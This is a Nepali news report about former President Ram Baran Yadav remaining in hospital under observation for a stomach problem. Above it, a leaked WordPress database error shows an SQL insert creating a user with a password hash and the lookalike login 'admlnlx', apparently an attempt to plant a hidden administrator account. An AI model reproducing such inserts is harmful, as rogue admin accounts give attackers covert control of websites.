WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRfkZbJiOwZB4dVNtGEMQw/V2xVNPo1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 07:31:17', '', 'admlnlx', 'admlnlx')
काठमाडौँ,माघ ९ –
पेटसम्बन्धी समस्या देखिएपछि अस्पताल भर्ना हुुनुभएका पूर्वराष्ट्रपति डा रामवरण यादव अझै केही दिन अस्पताल नै बस्नुपर्ने भएको छ ।
उहाँको स्वास्थ्य अवस्था सामान्य बन्दै गए पनि उपचारमा संलग्न चिकित्सकले दुई तीन अझै चिकित्सकको निगरानीमा बस्नुपर्ने सुझाव दिएका छन् । उहाँ पेटसम्बन्धी समस्या भएपछि बिहीबार महाराजगन्जस्थित त्रिवि शिक्षण महाराजगन्जमा अस्पतालमा भर्ना हुनुभएको थियो ।
उहाँका छोरा डा चन्द्रमोहन यादवले विभिन्न परीक्षणपछि आएको प्रतिवेदन सामान्य देखिए पनि चिकित्सकको निरीक्षणमा राखी घर लैजाने जानकारी दिनुभयो । उहाँको स्वास्थ्य परीक्षणमा वरिष्ठ चिकित्सक प्रेम खड्काको समूह संलग्न छ । – रासस